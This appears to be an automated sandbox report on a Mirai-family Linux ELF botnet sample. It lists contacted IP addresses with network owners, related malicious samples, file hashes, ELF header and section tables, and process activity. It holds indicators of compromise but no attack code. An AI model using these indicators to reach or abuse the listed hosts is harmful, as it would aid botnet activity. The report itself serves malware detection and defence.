          15699AS_ADAMAdamDatacenterESfalse
          108.66.20.54
          unknownUnited States
          7018ATT-INTERNET4USfalse
          153.28.10.0
          unknownUnited States
          6035DNIC-ASBLK-05800-06055USfalse
          23.143.235.227
          unknownReserved
          26311RANCH-WIFIUSfalse
          109.61.253.202
          unknownRussian Federation
          12389ROSTELECOM-ASRUfalse
          192.140.150.116
          unknownPakistan
          9541CYBERNET-APCyberInternetServicesPvtLtdPKfalse
          79.51.179.130
          unknownItaly
          3269ASN-IBSNAZITfalse
          18.153.210.97
          unknownUnited States
          16509AMAZON-02USfalse
          170.206.222.238
          unknownUnited States
          11685HNBCOL-ASUSfalse
          180.36.62.64
          unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
          48.21.211.76
          unknownUnited States
          2686ATGS-MMD-ASUSfalse
          78.243.182.174
          unknownFrance
          12322PROXADFRfalse
          37.205.15.241
          unknownCzech Republic
          24971MASTER-ASCzechRepublicwwwmasterczCZfalse
          79.164.236.167
          unknownRussian Federation
          8615CNT-ASMoscowRussiaRUfalse
          161.16.247.232
          unknownUnited States
          19512LYONDELLUSfalse
          79.45.108.70
          unknownItaly
          3269ASN-IBSNAZITfalse
          121.105.26.128
          unknownJapan2516KDDIKDDICORPORATIONJPfalse
          79.250.222.118
          unknownGermany
          3320DTAGInternetserviceprovideroperationsDEfalse
          114.124.221.227
          unknownIndonesia
          23693TELKOMSEL-ASN-IDPTTelekomunikasiSelularIDfalse
          17.54.84.50
          unknownUnited States
          714APPLE-ENGINEERINGUSfalse
          212.225.90.62
          unknownUnited Kingdom
          2529DEMON-INTERNETNowmaintainedbyCableWirelessWorldwidefalse
          66.233.205.164
          unknownUnited States
          59371DNC-ASDimensionNetworkCommunicationLimitedHKfalse
          151.111.130.165
          unknownUnited States
          1998STATE-OF-MNUSfalse
          149.20.37.20
          unknownUnited States
          1280ISC-AS-1280USfalse
          142.247.166.75
          unknownSaudi Arabia
          25019SAUDINETSTC-ASSAfalse
          135.82.210.102
          unknownUnited States
          18676AVAYAUSfalse
          172.115.149.251
          unknownUnited States
          20001TWC-20001-PACWESTUSfalse
          112.157.34.208
          unknownKorea Republic of
          17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
          117.32.10.124
          unknownChina
          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
          171.234.5.140
          unknownViet Nam
          7552VIETEL-AS-APViettelGroupVNfalse
          104.156.177.71
          unknownUnited States
          32391SRCACCESSUSfalse
          49.71.77.4
          unknownChina
          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
          148.157.94.122
          unknownUnited States
          18715NYPAUSfalse
          206.191.131.132
          unknownUnited States
          12180INTERNAP-2BLKUSfalse
          72.144.232.188
          unknownUnited States
          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
          89.168.19.182
          unknownUnited Kingdom
          9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
          79.67.224.213
          unknownUnited Kingdom
          9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
          72.113.124.153
          unknownUnited States
          22394CELLCOUSfalse
          183.43.144.109
          unknownChina
          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
          94.253.223.183
          unknownCroatia (LOCAL Name: Hrvatska)
          31012DCM-ASVipnetdooHRfalse
          157.162.207.134
          unknownGermany
          22192SSHENETUSfalse
          62.244.130.110
          unknownPoland
          12741AS-NETIAWarszawa02-822PLfalse
          93.54.44.180
          unknownItaly
          12874FASTWEBITfalse
          132.112.199.134
          unknownUnited States
          306DNIC-ASBLK-00306-00371USfalse
          142.151.239.229
          unknownCanada
          239UTORONTO-ASCAfalse
          129.13.58.104
          unknownGermany
          34878KITKarlsruheInstituteofTechnologyDEfalse
          12.149.31.20
          unknownUnited States
          7018ATT-INTERNET4USfalse
          96.177.129.225
          unknownUnited States
          7922COMCAST-7922USfalse
          218.75.202.225
          unknownChina
          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
          109.117.223.97
          unknownItaly
          30722VODAFONE-IT-ASNITfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          118.65.22.11F3TJqL0vDs.elfGet hashmaliciousGafgyt, MiraiBrowse
            134.187.82.27x86-20230924-1250.elfGet hashmaliciousMiraiBrowse
              47.238.157.83jRA66YUAW7Get hashmaliciousMiraiBrowse
                70.49.63.167hZRc7G8wdLGet hashmaliciousGafgyt MiraiBrowse
                  94.127.213.17666MALN3LSfGet hashmaliciousMiraiBrowse
                    5.118.43.253avxeC9WssiGet hashmaliciousMiraiBrowse
                      102.241.140.238V8UELfQsju.elfGet hashmaliciousMiraiBrowse
                        38.140.102.25i686-20220501-2200Get hashmaliciousMirai MoobotBrowse
                          8.145.236.26apep.x86Get hashmaliciousUnknownBrowse
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CTA-42-AS1226USCo8GEPjv8j.elfGet hashmaliciousMiraiBrowse
                            • 156.41.210.113
                            i586.elfGet hashmaliciousMiraiBrowse
                            • 169.3.229.199
                            vvV3pyLNs0.elfGet hashmaliciousMiraiBrowse
                            • 156.41.113.140
                            YEnJbXAPeu.elfGet hashmaliciousMiraiBrowse
                            • 156.41.178.187
                            m7Bm4mCkhy.elfGet hashmaliciousMiraiBrowse
                            • 156.60.62.179
                            2x40OMRCkY.elfGet hashmaliciousMiraiBrowse
                            • 156.60.26.41
                            RWCS3ICMHV.elfGet hashmaliciousUnknownBrowse
                            • 67.156.52.81
                            ua2cV1Y68W.elfGet hashmaliciousUnknownBrowse
                            • 134.187.252.94
                            arm7.elfGet hashmaliciousMirai, MoobotBrowse
                            • 134.186.104.101
                            idYcZwGPgA.elfGet hashmaliciousMiraiBrowse
                            • 159.145.222.145
                            oBtxppgLWB.elfGet hashmaliciousMiraiBrowse
                            • 67.156.123.249
                            ku1uI8KKoV.elfGet hashmaliciousUnknownBrowse
                            • 153.50.25.39
                            kuru.arm7.elfGet hashmaliciousUnknownBrowse
                            • 156.41.203.42
                            xxhFiiKSKy.elfGet hashmaliciousMiraiBrowse
                            • 156.41.209.227
                            Kb3RZ8k5pZ.elfGet hashmaliciousMiraiBrowse
                            • 151.143.103.69
                            mpsl.elfGet hashmaliciousUnknownBrowse
                            • 67.156.76.56
                            sora.mips.elfGet hashmaliciousMiraiBrowse
                            • 67.157.161.27
                            z0r0.x86.elfGet hashmaliciousMiraiBrowse
                            • 156.41.209.236
                            GntPlfffAN.elfGet hashmaliciousMiraiBrowse
                            • 153.49.4.173
                            x86.elfGet hashmaliciousMiraiBrowse
                            • 67.157.136.42
                            AS5413GBMa4NfFTyMr.elfGet hashmaliciousMiraiBrowse
                            • 109.170.250.172
                            arm7-20231212-1319.elfGet hashmaliciousMiraiBrowse
                            • 195.39.208.106
                            28VknHmVIO.elfGet hashmaliciousMiraiBrowse
                            • 62.232.92.98
                            lyLTUlEEaD.elfGet hashmaliciousMiraiBrowse
                            • 62.105.89.94
                            rZDXrc6Qgj.elfGet hashmaliciousMiraiBrowse
                            • 62.232.92.80
                            ebQv2WFr7U.elfGet hashmaliciousMiraiBrowse
                            • 62.44.89.197
                            jdQ5Lxv5Nd.elfGet hashmaliciousMiraiBrowse
                            • 80.69.132.193
                            imaginebeingarm7.elfGet hashmaliciousMirai, MoobotBrowse
                            • 80.234.204.20
                            BpSsm2RxvM.elfGet hashmaliciousMiraiBrowse
                            • 62.232.92.80
                            7vbrDg2AF5.elfGet hashmaliciousMiraiBrowse
                            • 62.232.92.75
                            5eFmWG76zz.elfGet hashmaliciousMiraiBrowse
                            • 176.35.108.227
                            mods.arm7.elfGet hashmaliciousMiraiBrowse
                            • 62.105.89.60
                            Eypxe2gysn.elfGet hashmaliciousMiraiBrowse
                            • 62.44.89.194
                            j5jq1GszFD.elfGet hashmaliciousMiraiBrowse
                            • 62.232.92.73
                            mM4FIrNQdC.elfGet hashmaliciousMiraiBrowse
                            • 62.105.89.76
                            wQb9yR6USY.elfGet hashmaliciousMiraiBrowse
                            • 5.179.109.7
                            FVShYxZJpc.elfGet hashmaliciousMiraiBrowse
                            • 62.105.89.81
                            n7BHnNF4CF.elfGet hashmaliciousMiraiBrowse
                            • 94.30.52.202
                            LFkxJbWFam.elfGet hashmaliciousMiraiBrowse
                            • 94.30.52.236
                            arm.elfGet hashmaliciousUnknownBrowse
                            • 62.232.92.94
                            ERX-CERNET-BKBChinaEducationandResearchNetworkCenterCuruFoiJiK.elfGet hashmaliciousMiraiBrowse
                            • 210.27.122.200
                            nig.arm7.elfGet hashmaliciousMiraiBrowse
                            • 210.36.174.153
                            arm4-20231216-1307.elfGet hashmaliciousMiraiBrowse
                            • 49.53.12.71
                            arm5-20231216-1200.elfGet hashmaliciousMiraiBrowse
                            • 58.196.60.120
                            arm7-20231215-0039.elfGet hashmaliciousMiraiBrowse
                            • 42.244.91.140
                            mips-20231212-1320.elfGet hashmaliciousMiraiBrowse
                            • 118.202.90.2
                            x86_64-20231212-1319.elfGet hashmaliciousMiraiBrowse
                            • 211.81.11.237
                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                            • 58.192.13.166
                            Vzqkkay7zK.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 210.35.196.38
                            h7m0G9L0ut.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 210.44.105.9
                            AjcelsaqC6.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 210.34.211.113
                            x86.elfGet hashmaliciousUnknownBrowse
                            • 111.114.154.200
                            0hrV6HPP3E.elfGet hashmaliciousMiraiBrowse
                            • 121.194.75.24
                            HZHDPhGvrL.elfGet hashmaliciousMiraiBrowse
                            • 222.16.133.54
                            arm5.elfGet hashmaliciousMiraiBrowse
                            • 58.202.129.248
                            DIcHAJitgN.elfGet hashmaliciousUnknownBrowse
                            • 202.242.60.206
                            GvJmL3JXiO.elfGet hashmaliciousMiraiBrowse
                            • 202.114.163.200
                            khXfv5zuf7.elfGet hashmaliciousMiraiBrowse
                            • 210.37.79.249
                            uxGCUW9aFw.elfGet hashmaliciousMiraiBrowse
                            • 222.24.201.134
                            mUZS5TqzCm.elfGet hashmaliciousMiraiBrowse
                            • 222.17.160.154
                            No context
                            No context
                            No created / dropped files found
                            File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                            Entropy (8bit):6.435218481766639
                            TrID:
                            • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                            • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                            File name:86O41HaCl5.elf
                            File size:47'100 bytes
                            MD5:77f6dbb4a1c2a1ca81d8f59fcc8f995d
                            SHA1:4ab8d151665d721c48f94c6b870c31b999a94152
                            SHA256:585014ced765a6632cd3ff845187e4c46d58955728e0ccd55952993500aa1642
                            SHA512:ccc7e8083e2c4fcedb91b95321d20f662ffe879a09d29374a56e0edb00ce0ad0536be721e7360df9d3d64760b97c6db724eb084c68bc3073c31a0039e28c99c5
                            SSDEEP:768:zo8Gll0RqYIijCGW8V5Y0rmppCyJwDs8F/F2z4gl8cqpN/:znRqYIi2L6OSlFsz4w8cqp
                            TLSH:04235BC5AA93DDF9EC110AB520369F328AB7E53E60A4DAC3C3E59473D902603E11735D
                            File Content Preview:.ELF....................d...4...D.......4. ...(.....................@...@...............D...DD..DD..................Q.td............................U..S............h....c...[]...$.............U......=.F...t..5.....D......D......u........t....h@4..........

                            ELF header

                            Class:ELF32
                            Data:2's complement, little endian
                            Version:1 (current)
                            Machine:Intel 80386
                            Version Number:0x1
                            Type:EXEC (Executable file)
                            OS/ABI:UNIX - System V
                            ABI Version:0
                            Entry Point Address:0x8048164
                            Flags:0x0
                            ELF Header Size:52
                            Program Header Offset:52
                            Program Header Size:32
                            Number of Program Headers:3
                            Section Header Offset:46660
                            Section Header Size:40
                            Number of Section Headers:11
                            Header String Table Index:10
                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                            NULL0x00x00x00x00x0000
                            .initPROGBITS0x80480940x940x1c0x00x6AX001
                            .textPROGBITS0x80480b00xb00xa3860x00x6AX0016
                            .finiPROGBITS0x80524360xa4360x170x00x6AX001
                            .rodataPROGBITS0x80524600xa4600xfe00x00x2A0032
                            .ctorsPROGBITS0x80544440xb4440x80x00x3WA004
                            .dtorsPROGBITS0x805444c0xb44c0x80x00x3WA004
                            .jcrPROGBITS0x80544540xb4540x40x00x3WA004
                            .dataPROGBITS0x80544800xb4800x1800x00x3WA0032
                            .bssNOBITS0x80546000xb6000x7400x00x3WA0032
                            .shstrtabSTRTAB0x00xb6000x430x00x0001
                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                            LOAD0x00x80480000x80480000xb4400xb4406.47090x5R E0x1000.init .text .fini .rodata
                            LOAD0xb4440x80544440x80544440x1bc0x8fc3.80530x6RW 0x1000.ctors .dtors .jcr .data .bss
                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                            Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                            System Behavior

                            Start time (UTC):16:04:39
                            Start date (UTC):21/12/2023
                            Path:/tmp/86O41HaCl5.elf
                            Arguments:/tmp/86O41HaCl5.elf
                            File size:47100 bytes
                            MD5 hash:77f6dbb4a1c2a1ca81d8f59fcc8f995d

                            Start time (UTC):16:04:39
                            Start date (UTC):21/12/2023
                            Path:/tmp/86O41HaCl5.elf
                            Arguments:-
                            File size:47100 bytes
                            MD5 hash:77f6dbb4a1c2a1ca81d8f59fcc8f995d

                            Start time (UTC):16:04:39
                            Start date (UTC):21/12/2023
                            Path:/tmp/86O41HaCl5.elf
                            Arguments:-
                            File size:47100 bytes
                            MD5 hash:77f6dbb4a1c2a1ca81d8f59fcc8f995d

                            Start time (UTC):16:04:39
                            Start date (UTC):21/12/2023
                            Path:/tmp/86O41HaCl5.elf
                            Arguments:-
                            File size:47100 bytes
                            MD5 hash:77f6dbb4a1c2a1ca81d8f59fcc8f995d
                            Start time (UTC):16:04:39
                            Start date (UTC):21/12/2023
                            Path:/tmp/86O41HaCl5.elf
                            Arguments:-
                            File size:47100 bytes
                            MD5 hash:77f6dbb4a1c2a1ca81d8f59fcc8f995d
                            Start time (UTC):16:04:39
                            Start date (UTC):21/12/2023
                            Path:/tmp/86O41HaCl5.elf
                            Arguments:-
                            File size:47100 bytes
                            MD5 hash:77f6dbb4a1c2a1ca81d8f59fcc8f995d

                            Start time (UTC):16:06:05
                            Start date (UTC):21/12/2023
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):16:06:05
                            Start date (UTC):21/12/2023
                            Path:/usr/bin/rm
                            Arguments:rm -f /tmp/tmp.cQn9x2yAlZ /tmp/tmp.PRPRcDblVS /tmp/tmp.P0JqeoQ9qa
                            File size:72056 bytes
                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b